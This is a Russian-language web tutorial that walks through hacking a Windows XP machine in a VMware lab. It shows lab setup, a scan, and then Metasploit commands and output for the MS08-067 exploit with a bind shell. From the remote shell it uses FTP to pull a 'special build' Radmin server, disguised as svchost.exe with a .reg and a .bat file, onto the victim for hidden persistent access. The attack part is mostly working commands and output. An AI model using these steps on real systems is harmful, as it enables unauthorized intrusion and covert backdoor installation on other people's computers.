ВЗЛОМ ПК, под управлением Windows

#ВЗЛОМ ПК, под управлением Windows. # КЛАССИФИКАЦИЯ АТАК. Атаки на протокол Атаки на ПО Атаки на пользователя ПОЛИГОН ДЛЯ ИСПЫТАНИЙ. Необходимый софт: Любой дистрибьютив Windows XP (SP2,SP3 ) Виртуальная машина Vmware. Итак, нам нужно где-то законно, развивать свои навыки, для этого создадим виртуальную машину и установим на нее так любимый пользователями Windows, надеюсь все уже скачали виртуальную машину Vmware, устанавливаем и открываем. Создаем новую машину в Vmware, для этого зажимаем CTRL+N, и следум инструкциям, там все интуитивно понятно. Теперь идем в Edit => Virtual Network Setting и переходим на вкладку Host Virtual Adapter http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_sPqVgrSI/AAAAAAAAABU/mbkjmgkOPZw/s1600-h/4.JPG Нажимаем add и создаем нужное количество виртуальных адаптеров. Затем идем в DHCP и удаляем от туда все адаптеры кроме, Wmnet1 и Wmnet8. Тут можно нажать Принять и ОК, или же сходить в Host Virtual Network Mapping и настроить каждому http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_sYkHlZUI/AAAAAAAAABc/qjfM2pZ377g/s320/6.JPG адаптеру свой ip, если этого не сделать, то они будут назначенны автоматически. Заходим в настройки виртуальной манины CTR+D, переходим на вкладку Enternet, выбираем Custop Specifnc: virtual network и назначаем любой понравившейся интерфейс, конечно, кроме Wmnet1 и Wmnet8, я выбрал Vmnet2. http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tAviI_NI/AAAAAAAAABk/9KgaPlft3Vg/s320/7.JPG Теперь переходим к CD-ROM, ставим галочку на Use ISO image, жмем обзор и выбираем образ с которого будем устанавливать Windows, мы также можем установить его с диска отметив Use physical drive, и выбрав соответствующий привод. http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_tPG8Z0HI/AAAAAAAAABs/VhLjeTEXL3U/s320/8.JPG Ну вот приготовления закончены теперь запускаем виртуальную машину и жмем F12, если вы все правильно сконфигурировали, то перед вами появится окно установки. В моем случае оно выглядит так, у вас может отличатся, завит от уставливаемой ОС. Я использовал сборку ZVERDVD. http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tbjgIAiI/AAAAAAAAAB0/lDyNMxBWq5g/s320/9.JPG #УСТАНОВКА СВЯЗИ.# Необходимый софт: ФТП — сервер (Serv -U) Значит, после установки необходимо настроить сеть, между нашим реальным ПК и Виртуальным. Для этого идем в свойства подключения виртуального адаптера, который вы выбрали на вкладке Enternet у меня это Vmnet2. http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_t-0smY_I/AAAAAAAAAB8/gfPFPI4pUD8/s400/11.JPG IP адресс 192.168.1.3 Маска подсети 255.255.255.0 Теперь загружаем виртуальную машину и также идем в сетевые подключения и смотрим свойства tcp/ip. http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_uM38r_JI/AAAAAAAAACE/1rMp4pVRuhc/s400/10.JPG Настраиваем следующим образом: IP адресс 192.168.1.10 Маска подсети 255.255.255.0 Основной шлюз 192.168.1.3 Осталось только поставить ФТП сервер на наш реальный ПК. Я выбрал Serv -U, он заводится с пол аборота. Важно, когда будете создавать пользователя, создавайте без пароля, да и вешайте фтп на стандартный 21 порт, используемый протокол тоже ФТП. http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_ueYAqsjI/AAAAAAAAACM/nM1W9kgxHBY/s400/12.JPG #ПРИМЕР.# Необходимый софт: Metasploit 3.2 Radmin Viewer 3 RadminServer (спец. Сборка) Сканим комп xspider'ом http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_5nXMqGLI/AAAAAAAAACs/TZRNc3_wzlA/s400/16.JPG Для взлома мы бужем использовать, недавно обнаруженную уязвимость в службе Server(ms08_067).Запускаем Metasploit 3 Web, ждем пока загрузится и затем в адресной строке браузера пишем 127.0.0.1:55555. http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_uwjg_pzI/AAAAAAAAACU/r3l9-k44ksE/s400/13.JPG use windows/smb/ms08_067_netapi ; наш сплоит set PAYLOAD generic/shell_bind_tcp ; выбираем начинку PAYLOAD => generic/shell_bind_tcp set RHOST 192.168.1.10 ; хост-жертва RHOST => 192.168.1.10 set LPORT 7777 ; локальный порт LPORT => 7777 set RPORT 445 ; удаленный порт RPORT => 445 exploit
  • Started bind handler
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 3 - lang:Russian
  • Selected Target: Windows XP SP3 Russian (NX)
  • Triggering the vulnerability...
  • Command shell session 1 opened (192.168.1.3:5583 -> 192.168.1.10:7777) Microsoft Windows XP [‚¥àá¨ï 5.1.2600] (‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001. C:WINDOWSsystem32> Получили командную строку на удаленной системе {создаем в папке windows, папку helps} cd c:windows mkdir helps {коннектимся к нашему компу} ftp192.168.1.3 Пользователь (192.168.1.3:(none)): kerny {успешный коннект, идем c:kerny нашего фтп, именно там хранится радмин} cd c:kerny dir {файлы радмина} drw-rw-rw- 1 user group 0 Mar 2 20:10 . drw-rw-rw- 1 user group 0 Mar 2 20:10 .. -rw-rw-rw- 1 user group 547 Mar 2 20:10 111.bat -rw-rw-rw- 1 user group 940 Mar 2 20:10 111.reg -rw-rw-rw- 1 user group 40448 Mar 2 20:10 AdmDll.dll -rw-rw-rw- 1 user group 17408 Mar 2 20:10 raddrv.dll -rw-rw-rw- 1 user group 152576 Mar 2 20:10 svchost.exe {сливаем файлы на комп жертвы в папку windowshelps} get 111.bat c:windowshelps111.bat get 111.reg c:windowshelps111.reg get AdmDll.dll c:windowshelpsAdmDll.dll get raddrv.dll c:windowshelpsraddrv.dll get svchost.exe c:windowshelpssvchost.exe {отключаемся от нашего фтп} bye {идем в папку, и проверяем скачались ли файлы} cd c:windowshelps dir -rw-rw-rw- 1 user group 547 Mar 2 20:11 111.bat -rw-rw-rw- 1 user group 940 Mar 2 20:11 111.reg -rw-rw-rw- 1 user group 40448 Mar 2 20:12 AdmDll.dll -rw-rw-rw- 1 user group 17408 Mar 2 20:12 raddrv.dll -rw-rw-rw- 1 user group 152576 Mar 2 20:12 svchost.exe
  • [left][/left]

    Добавь наш сайт в закладки зажми клавиши (Ctrl+D)

    Похожие новости
    File engine/modules/xf_topics/1.php not found.

    (0) Комметарии

    К этой статье комментарии в данный момент отсутствуют :(

    Информация
    Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.